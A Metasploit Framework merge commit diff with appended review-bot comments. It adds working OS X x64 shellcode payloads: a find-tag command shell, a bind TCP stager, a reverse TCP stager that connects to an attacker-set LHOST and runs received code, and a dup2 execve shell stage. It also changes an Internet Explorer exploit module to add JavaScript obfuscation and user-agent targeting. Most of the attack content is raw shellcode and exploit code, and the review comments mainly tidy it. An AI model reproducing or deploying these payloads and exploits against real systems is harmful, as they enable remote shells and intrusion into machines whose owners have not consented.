Merge branch 'upstream-master'

bug/bundler_fix
Tod Beardsley 2012-09-25 08:28:38 -05:00
commit f54656f7b5
15 changed files with 748 additions and 56 deletions



@ -13,6 +13,7 @@ import java.awt.event.FocusListener;
import java.awt.event.MouseAdapter; import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent; import java.awt.event.MouseEvent;
import java.awt.event.MouseMotionAdapter; import java.awt.event.MouseMotionAdapter;
import java.awt.event.MouseMotionListener;
import java.awt.event.WindowEvent; import java.awt.event.WindowEvent;
import java.awt.event.WindowFocusListener; import java.awt.event.WindowFocusListener;
import java.util.ArrayList; import java.util.ArrayList;
@ -49,7 +50,16 @@ public class DraggableTabbedPane extends JTabbedPane{
static{ static{
//Set up placeholder window. (Shows when moving tabs) //Set up placeholder window. (Shows when moving tabs)
window = new JWindow(); window = new JWindow();
window.getContentPane().add(new JLabel("Moving", JLabel.CENTER), java.awt.BorderLayout.CENTER); JLabel lab = new JLabel("Moving", JLabel.CENTER);
lab.addMouseMotionListener(new MouseMotionListener() {
public void mouseMoved(MouseEvent e) {
window.setVisible(false);
}
public void mouseDragged(MouseEvent e) {
window.setVisible(false);
}
});
window.getContentPane().add(lab, java.awt.BorderLayout.CENTER);
window.setSize(300, 300); window.setSize(300, 300);
} }
@ -333,7 +343,7 @@ public class DraggableTabbedPane extends JTabbedPane{
//Set up dragging listener //Set up dragging listener
addMouseMotionListener(new MouseMotionAdapter() { addMouseMotionListener(new MouseMotionAdapter() {
public void mouseDragged(MouseEvent e) { public void mouseDragged(MouseEvent e) {
if (!dragging) { if (!dragging && ((e.getModifiersEx() & MouseEvent.BUTTON1_DOWN_MASK) != 0)) {
// Gets the tab index based on the mouse position // Gets the tab index based on the mouse position
int tabNumber = getUI().tabForCoordinate(DraggableTabbedPane.this, e.getX(), e.getY()); int tabNumber = getUI().tabForCoordinate(DraggableTabbedPane.this, e.getX(), e.getY());
if (tabNumber < 0) if (tabNumber < 0)
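Review bot: The listener added to the placeholder label in the static initializer implements both MouseMotionListener methods with the same `window.setVisible(false)` body, while the class already imports MouseMotionAdapter; `lab.addMouseMotionListener(new MouseMotionAdapter() { ... })` overriding only the two callbacks would drop the new java.awt.event.MouseMotionListener import and the duplicated bodies. The purpose of hiding the window when the pointer moves over the label is not stated; presumably it keeps the placeholder from sitting under the pointer during a drag, and a one-line comment such as `// Hide the placeholder if the pointer ends up over it` would record that. The BUTTON1_DOWN_MASK guard in mouseDragged is a sensible addition. Both the static initializer and the drag handler continue outside the hunk.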


@ -114,7 +114,8 @@ public abstract class RpcConnection {
* @throws IOException * @throws IOException
*/ */
protected void disconnect() throws SocketException, IOException{ protected void disconnect() throws SocketException, IOException{
connection.close(); if(connection != null)
connection.close();
} }
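Review bot: The null guard in disconnect() is written as a brace-less `if` on two lines, so any statement later added after `connection.close();` would silently run outside the guard; `if (connection != null) { connection.close(); }` is the safer form. The field is also left pointing at the closed socket, which is harmless for a single close but means a second disconnect() call re-closes the same object rather than being a no-op; nulling it after close (`connection = null;`) would make repeated calls clearly idempotent, assuming nothing else reads the field after disconnect. The Javadoc above still documents both exception types, which is fine since the signature is unchanged.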
/** /**


@ -6,7 +6,6 @@
## ##
require 'msf/core' require 'msf/core'
require 'json'
class Metasploit3 < Msf::Auxiliary class Metasploit3 < Msf::Auxiliary
@ -45,7 +44,6 @@ class Metasploit3 < Msf::Auxiliary
], self.class) ], self.class)
end end
def run def run
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
@ -63,6 +61,13 @@ class Metasploit3 < Msf::Auxiliary
return return
end end
begin
require 'json'
rescue LoadError
print_error("Json is not available on your machine")
return
end
begin begin
j = JSON.parse(res.body) j = JSON.parse(res.body)
@ -78,7 +83,6 @@ class Metasploit3 < Msf::Auxiliary
rescue JSON::ParserError rescue JSON::ParserError
print_error("Unable to parse JSON") print_error("Unable to parse JSON")
print_line(res.body) print_line(res.body)
end end
end end
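Review bot: The new `require 'json'` / `rescue LoadError` block sits after `send_request_cgi`, so on a host without the json library the module still sends the POST to the target and only then reports that it cannot parse the answer; moving the require/rescue to the top of `run` (ahead of the request) or into `initialize` fails fast before any traffic is generated. The message text `Json is not available on your machine` would read better as `JSON library is not available`, and `print_line(res.body)` on parse failure still echoes the raw response body to the console, which the rescue path inherits from the previous version. The enclosing `run` method starts outside the hunk.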


@ -25,10 +25,10 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info, super(update_info(info,
'Name' => 'HTTP Form Field Fuzzer', 'Name' => 'HTTP Form Field Fuzzer',
'Description' => %q{ 'Description' => %q{
This module will grab all fields from a form, This module will grab all fields from a form,
and launch a series of POST actions, fuzzing the contents and launch a series of POST actions, fuzzing the contents
of the form fields. You can optionally fuzz headers too of the form fields. You can optionally fuzz headers too
(option is enabled by default) (option is enabled by default)
}, },
'Author' => [ 'Author' => [
'corelanc0d3r', 'corelanc0d3r',
@ -69,28 +69,12 @@ class Metasploit3 < Msf::Auxiliary
proto = "https://" proto = "https://"
end end
useragent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15"
if datastore['UserAgent'] != nil
if datastore['UserAgent'].length > 0
useragent = datastore['UserAgent']
end
end
host = datastore['RHOST']
if datastore['VHOST']
if datastore['VHOST'].length > 0
host = datastore['VHOST']
end
end
@send_data = { @send_data = {
:uri => '', :uri => '',
:version => '1.1', :version => '1.1',
:method => 'POST', :method => 'POST',
:headers => { :headers => {
'Content-Length' => 100, 'Content-Length' => 100,
'Host' => host,
'User-Agent' => useragent,
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' => 'en-us,en;q=0.5', 'Accept-Language' => 'en-us,en;q=0.5',
'Accept-Encoding' => 'gzip,deflate', 'Accept-Encoding' => 'gzip,deflate',
@ -98,12 +82,10 @@ class Metasploit3 < Msf::Auxiliary
'Keep-Alive' => '300', 'Keep-Alive' => '300',
'Connection' => 'keep-alive', 'Connection' => 'keep-alive',
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s, 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
'Content-Type' => 'application/x-www-form-urlencoded', 'Content-Type' => 'application/x-www-form-urlencoded'
} }
} }
@get_data_headers = { @get_data_headers = {
'Host' => host,
'User-Agent' => useragent,
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s, 'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
} }
end end
@ -272,6 +254,8 @@ class Metasploit3 < Msf::Auxiliary
end end
datastr=datastr[0,datastr.length-1] datastr=datastr[0,datastr.length-1]
@send_data[:uri] = form[:action] @send_data[:uri] = form[:action]
@send_data[:uri] = "/#{form[:action]}" if @send_data[:uri][0,1] != '/'
@send_data[:method] = form[:method].upcase @send_data[:method] = form[:method].upcase
response = send_fuzz(@send_data,datastr) response = send_fuzz(@send_data,datastr)
if not process_response(response,field,"field") if not process_response(response,field,"field")
@ -322,7 +306,7 @@ class Metasploit3 < Msf::Auxiliary
end end
def get_field_val(input) def get_field_val(input)
tmp = input.split(/=/) tmp = input.split(/\=/)
#get delimeter #get delimeter
tmp2 = tmp[1].strip tmp2 = tmp[1].strip
delim = tmp2[0,1] delim = tmp2[0,1]
@ -435,7 +419,7 @@ class Metasploit3 < Msf::Auxiliary
location = fielddata[0].index(thisfield) location = fielddata[0].index(thisfield)
delta = fielddata[0].size - location delta = fielddata[0].size - location
remaining = fielddata[0][location,delta] remaining = fielddata[0][location,delta]
tmp = remaining.strip.split(/=/) tmp = remaining.strip.split(/\=/)
if tmp.size > 1 if tmp.size > 1
delim = tmp[1][0,1] delim = tmp[1][0,1]
tmp2 = tmp[1].split(delim) tmp2 = tmp[1].split(delim)
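Review bot: The new leading-slash fix `@send_data[:uri] = "/#{form[:action]}" if @send_data[:uri][0,1] != '/'` assumes form[:action] is a non-nil relative path, but the action is parsed out of the scanned page's HTML: a form with no action attribute makes `@send_data[:uri]` nil and the `[0,1]` call raises NoMethodError, and an absolute action such as `http://host/path` is rewritten to `/http://host/path`. Coercing first and prefixing only plain relative paths keeps the fix without the crash, e.g. `action = form[:action].to_s` followed by `@send_data[:uri] = (action.start_with?('/') || action =~ %r{\A\w+://}) ? action : "/#{action}"`; whether an absolute action should be skipped or have its host stripped is a separate decision the module should state. The `/=/` to `/\=/` change in get_field_val and in the later hunk is a no-op, since `=` is not a regex metacharacter, so the unescaped form was the clearer one. The enclosing method starts before the hunk.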


@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'References' => 'References' =>
[ [
['OSVDB', '85654'],
['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/'] ['URL', 'http://itsecuritysolutions.org/2012-09-21-ZEN-Load-Balancer-v2.0-and-v3.0-rc1-multiple-vulnerabilities/']
], ],
'DefaultOptions' => 'DefaultOptions' =>


@ -30,6 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'References' => 'References' =>
[ [
['OSVDB', '85554'],
['EDB', '21329'] ['EDB', '21329']
], ],
'Payload' => 'Payload' =>


@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'unknown', # Some secret ninja 'unknown', # via ZDI
'eromang', # First public discovery 'eromang', # First public discovery
'binjo', 'binjo',
'sinn3r', # Metasploit 'sinn3r', # Metasploit
@ -78,27 +78,40 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => false, 'Privileged' => false,
'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang 'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)
end end
def get_target(agent) def get_target(agent)
#If the user is already specified by the user, we'll just use that #If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic' return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
return targets[1] #IE 7 on Windows XP SP3 ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
return targets[2] #IE 8 on Windows XP SP3 ie_name = "IE #{ie}"
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[3] #IE 7 on Windows Vista case nt
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/ when '5.1'
return targets[4] #IE 8 on Windows Vista os_name = 'Windows XP SP3'
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/ when '6.0'
return targets[5] #IE 8 on Windows 7 os_name = 'Windows Vista'
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/ when '6.1'
return targets[6] #IE 9 on Windows 7 os_name = 'Windows 7'
else
return nil
end end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
vprint_status("Target selected as: #{t.name}")
return t
end
end
return nil
end end
def junk(n=4) def junk(n=4)
@ -283,8 +296,12 @@ class Metasploit3 < Msf::Exploit::Remote
end end
js = heaplib(js, {:noobfu => true}) js = heaplib(js, {:noobfu => true})
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate
end
html = <<-EOS html = %Q|
<html> <html>
<body> <body>
<script> <script>
@ -299,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote
</script> </script>
</body> </body>
</html> </html>
EOS |
return html return html
end end
@ -335,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
print_status request.headers['User-Agent'] uri = request.uri
agent = request.headers['User-Agent'] agent = request.headers['User-Agent']
my_target = get_target(agent) my_target = get_target(agent)
vprint_status("Requesting: #{uri}")
print_status(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting # Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil? if my_target.nil?
print_error("Browser not supported, sending a 404: #{agent.to_s}") print_error("Browser not supported, sending a 404: #{agent.to_s}")
@ -346,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote
return return
end end
vprint_status("Requesting: #{request.uri}") if uri =~ /#{@html2_name}/
if request.uri =~ /#{@html2_name}/
print_status("Loading #{@html2_name}") print_status("Loading #{@html2_name}")
html = load_html2 html = load_html2
elsif request.uri =~ /#{@html1_name}/ elsif uri =~ /#{@html1_name}/
print_status("Loading #{@html1_name}") print_status("Loading #{@html1_name}")
html = load_html1(cli, my_target) html = load_html1(cli, my_target)
elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/ elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
print_status("Redirecting to #{@html1_name}") print_status("Redirecting to #{@html1_name}")
send_redirect(cli, "#{this_resource}/#{@html1_name}") send_redirect(cli, "#{this_resource}/#{@html1_name}")
return return
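Review bot: The rewritten get_target calls `agent.scan(...)` on the raw User-Agent value, but the header can be absent: the previous `agent =~ /.../` form tolerated nil (NilClass#=~ returns nil), whereas `nil.scan` raises NoMethodError, and on_request_uri passes `request.headers['User-Agent']` straight in before its own `agent.to_s` guard in the 404 message. Adding `agent = agent.to_s` as the first statement of get_target restores the old tolerance with no other change. The selection loop also depends on every target name containing both the `IE n` string and the OS string built in the `case`; a comment above `targets.each` such as `# target names must contain both "IE <ver>" and the OS name used below` would keep a later rename from silently disabling a target. The targets array and the rest of on_request_uri are outside the hunks.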


@ -0,0 +1,53 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
module Metasploit3
include Msf::Payload::Single
def initialize(info = {})
super(merge_info(info,
'Name' => 'OSX X64 say Shellcode',
'Version' => '$Revision$',
'Description' => 'Say an arbitrary string outloud using Mac OS X text2speech',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64
))
# exec payload options
register_options(
[
OptString.new('TEXT', [ true, "The text to say", "Hello\!"]),
], self.class)
end
# build the shellcode payload dynamically based on the user-provided CMD
def generate
say = (datastore['TEXT'] || '') << "\x00"
call = "\xe8" + [say.length + 0xd].pack('V')
payload =
"\x48\x31\xC0" + # xor rax,rax
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
call +
"/usr/bin/say\x00" +
say +
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
"\x4C\x8D\x57\x0D" + # lea r10,[rdi+0xd]
"\x48\x31\xD2" + # xor rdx,rdx
"\x52" + # push rdx
"\x41\x52" + # push r10
"\x57" + # push rdi
"\x48\x89\xE6" + # mov rsi,rsp
"\x0F\x05" # loadall286
end
end
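Review bot: `say = (datastore['TEXT'] || '') << "\x00"` in generate appends to the string object it receives, so if datastore returns the stored String rather than a copy, every call to generate adds another NUL to the option value; `say = "#{datastore['TEXT']}\x00"` builds a fresh string and the same fix applies to the `cmd = (datastore['CMD'] || '') << "\x00"` line in the find-tag payload added in this commit. The header comment says the payload is built from "the user-provided CMD" although the option here is TEXT, and the `# loadall286` comments on the `\x0F\x05` bytes are a 16-bit disassembler reading; in 64-bit mode that opcode is `syscall`, and the same comment appears in the find-tag payload and the bind stager. The `0xd` in `call` and in `lea r10,[rdi+0xd]` is the length of `"/usr/bin/say\x00"`, which is worth stating next to the constant.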


@ -0,0 +1,84 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/find_tag'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Osx
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'OSX Command Shell, Find Tag Inline',
'Version' => '$Revision$',
'Description' => 'Spawn a shell on an established connection (proxy/nat safe)',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'Handler' => Msf::Handler::FindTag,
'Session' => Msf::Sessions::CommandShellUnix
))
# exec payload options
register_options(
[
OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]),
OptString.new('TAG', [ true, "The tag to test for", "NEMO" ]),
], self.class)
end
#
# ensures the setting of tag to a four byte value
#
def generate
cmd = (datastore['CMD'] || '') << "\x00"
call = "\xe8" + [cmd.length].pack('V')
payload =
"\x48\x31\xFF" + # xor rdi,rdi
"\x57" + # push rdi
"\x48\x89\xE6" + # mov rsi,rsp
"\x6A\x04" + # push byte +0x4
"\x5A" + # pop rdx
"\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2]
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xC9" + # xor r9,r9
"\x48\xFF\xCF" + # dec rdi
"\x48\xFF\xC7" + # inc rdi
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f
datastore['TAG'] +
"\x75\xED" + # jnz 0x17
"\x48\x31\xC9" + # xor rcx,rcx
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
"\x48\x31\xF6" + # xor rsi,rsi
"\x0F\x05" + # loadall286
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
"\x48\xFF\xC6" + # inc rsi
"\x0F\x05" + # loadall286
"\x48\x31\xC0" + # xor rax,rax
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
call +
cmd +
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
"\x48\x31\xD2" + # xor rdx,rdx
"\x52" + # push rdx
"\x57" + # push rdi
"\x48\x89\xE6" + # mov rsi,rsp
"\x0F\x05" # loadall286
end
end
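Review bot: `datastore['TAG'] +` is spliced directly into the `cmp dword [rsp], imm32` encoding, so the option must be exactly four bytes: a shorter or longer TAG shifts every following byte and the `jnz` displacement no longer points where the comment says. The header comment above generate promises that the tag is forced to four bytes, but nothing does so; `tag = datastore['TAG'].to_s` followed by `raise ArgumentError, "TAG must be exactly 4 bytes" unless tag.bytesize == 4` before the payload assembly makes the contract explicit, or the value could be padded/truncated to four bytes if that is the intended behaviour. The description of the option (`The tag to test for`) should also mention the length requirement.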


@ -0,0 +1,101 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
module Metasploit3
include Msf::Payload::Stager
def initialize(info = { })
super(merge_info(info,
'Name' => 'Bind TCP Stager',
'Version' => '$Revision$',
'Description' => 'Listen, read length, read buffer, execute',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'Handler' => Msf::Handler::BindTcp,
'Convention' => 'sockedi',
'Stager' =>
{
'Offsets' => { 'LPORT' => [ 31, 'n'] },
'Payload' =>
"\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
"\x6A\x02" + # push byte +0x2
"\x5F" + # pop rdi
"\x6A\x01" + # push byte +0x1
"\x5E" + # pop rsi
"\x48\x31\xD2" + # xor rdx,rdx
"\x0F\x05" + # loadall286
"\x48\x89\xC7" + # mov rdi,rax
"\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
"\x48\x31\xF6" + # xor rsi,rsi
"\x56" + # push rsi
"\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200
"\x56" + # push rsi
"\x48\x89\xE6" + # mov rsi,rsp
"\x6A\x10" + # push byte +0x10
"\x5A" + # pop rdx
"\x0F\x05" + # loadall286
"\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
"\x48\x31\xF6" + # xor rsi,rsi
"\x48\xFF\xC6" + # inc rsi
"\x49\x89\xFC" + # mov r12,rdi
"\x0F\x05" + # loadall286
"\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
"\x4C\x89\xE7" + # mov rdi,r12
"\x48\x89\xE6" + # mov rsi,rsp
"\x48\x89\xE2" + # mov rdx,rsp
"\x48\x83\xEA\x04" + # sub rdx,byte +0x4
"\x0F\x05" + # loadall286
"\x49\x89\xC5" + # mov r13,rax
"\x48\x89\xC7" + # mov rdi,rax
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x48\x31\xC9" + # xor rcx,rcx
"\x51" + # push rcx
"\x48\x89\xE6" + # mov rsi,rsp
"\xBA\x04\x00\x00\x00" + # mov edx,0x4
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xD2" + # xor r10,r10
"\x0F\x05" + # loadall286
"\x41\x5B" + # pop r11
"\x4C\x89\xDE" + # mov rsi,r11
"\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
"\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
"\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5
"\x48\x31\xFF" + # xor rdi,rdi
"\x48\xFF\xCF" + # dec rdi
"\xBA\x07\x00\x00\x00" + # mov edx,0x7
"\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
"\x49\x89\xF8" + # mov r8,rdi
"\x4D\x31\xC9" + # xor r9,r9
"\x0F\x05" + # loadall286
"\x48\x89\xC6" + # mov rsi,rax
"\x56" + # push rsi
"\x4C\x89\xEF" + # mov rdi,r13
"\x48\x31\xC9" + # xor rcx,rcx
"\x4C\x89\xDA" + # mov rdx,r11
"\x4D\x31\xC0" + # xor r8,r8
"\x4D\x31\xD2" + # xor r10,r10
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
"\x0F\x05" + # loadall286
"\x58" + # pop rax
"\xFF\xD0" # call rax
}
))
end
def handle_intermediate_stage(conn, p)
#
# Our stager payload expects to see a next-stage length first.
#
conn.put([p.length].pack('V'))
end
end


@ -0,0 +1,57 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
module Metasploit3
include Msf::Payload::Stager
def initialize(info = { })
super(merge_info(info,
'Name' => 'Reverse TCP Stager',
'Version' => '$Revision$',
'Description' => 'Connect, read length, read buffer, execute',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'Handler' => Msf::Handler::ReverseTcp,
'Convention' => 'sockedi',
'Stager' =>
{
'Offsets' =>
{
'LHOST' => [ 37, 'ADDR'],
'LPORT' => [ 35, 'n']
},
'Payload' =>
"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
}
))
end
def handle_intermediate_stage(conn, p)
#
# Our stager payload expects to see a next-stage length first.
#
conn.put([p.length].pack('V'))
end
end
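Review bot: The reverse stager's 'Payload' is an uncommented hex blob, unlike the bind stager in this commit which annotates every instruction, so the `LHOST => [37, 'ADDR']` and `LPORT => [35, 'n']` offsets cannot be checked against the bytes without re-disassembling; counting the literal, byte 31 starts a `48 BE` (`mov rsi, imm64`) whose immediate holds the sockaddr_in, with the port at 35–36 and the address at 37–40, so the offsets are correct as written. A comment above 'Offsets' such as `# LHOST/LPORT patch the sockaddr_in immediate of the mov rsi,imm64 at byte 31` and a short outline of the stages (socket, connect, recv length, mmap, recv stage, call) would let the next editor re-assemble the stager without breaking the patch points. The description string 'Connect, read length, read buffer, execute' could carry that outline as well.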


@ -0,0 +1,38 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'OS X dup2 Command Shell',
'Version' => '$Revision$',
'Description' => 'dup2 socket in edi, then execve',
'Author' => 'nemo',
'License' => MSF_LICENSE,
'Platform' => 'osx',
'Arch' => ARCH_X86_64,
'Session' => Msf::Sessions::CommandShell,
'Stage' =>
{
'Payload' =>
"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+
"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+
"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+
"\x52\x57\x48\x89\xe6\x0f\x05"
}
))
end
end


@ -62,7 +62,8 @@ class Metasploit3 < Msf::Post
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ }, { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb76a, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb827, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ }, { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xb391, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xb44e, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ }, { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xacf6, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xadb3, :os => /Windows Vista/ },
{ :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ } { :sig => "8bff558bec81ec88000000a1", :sigoffset => 0xe881, :orig_code => "32c0", :patch => "b001", :patchoffset => 0xe93e, :os => /Windows 7/ },
{ :sig => "8bff558bec83ec50a1", :sigoffset => 0x97d3, :orig_code => "32c0", :patch => "b001", :patchoffset => 0x9878, :os => /Windows XP.*Service Pack 3 - spanish/ }
] ]
unsupported if client.platform !~ /win32|win64/i unsupported if client.platform !~ /win32|win64/i


@ -0,0 +1,339 @@
##
# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'rex'
require 'msf/core'
require 'msf/core/post/file'
require 'msf/core/post/common'
require 'msf/core/post/windows/registry'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Post::Common
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather Database Instance Enumeration',
'Description' => %q{ This module will enumerate a windows system for installed database instances },
'License' => MSF_LICENSE,
'Author' => [
'Barry Shteiman <barry[at]sectorix.com>', # Module author
'juan vazquez' # minor help
],
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
# method called when command run is issued
def run
results = []
print_status("Enumerating Databases on #{sysinfo['Computer']}")
if check_mssql
results += enumerate_mssql
end
if check_oracle
results += enumerate_oracle
end
if check_db2
results += enumerate_db2
end
if check_mysql
results += enumerate_mysql
end
if check_sybase
results += enumerate_sybase
end
if results.empty?
print_status("Done, No Databases were found")
return
end
print_status("Done, Databases Found.")
tbl = Rex::Ui::Text::Table.new(
'Header' => "Installed Databases",
'Indent' => 1,
'Columns' =>
[
"Type",
"Instance",
"Database",
"Port"
])
results.each { |r|
report_service(:host => session.sock.peerhost, :port => r[3], :name => r[0], :info => "#{r[0]}, #{r[1]}")
tbl << r
}
print_line(tbl.to_s)
p = store_loot("host.databases", "text/plain", session, tbl.to_s, "databases.txt", "Running Databases")
print_status("Results stored in: #{p}")
end
##### initial identification methods #####
# method for Checking if database instances are installed on host - mssql
def check_mssql
key = "HKLM\\SOFTWARE\\Microsoft"
if registry_enumkeys(key).include?("Microsoft SQL Server")
print_status("\tMicrosoft SQL Server found.")
return true
end
return false
rescue
return false
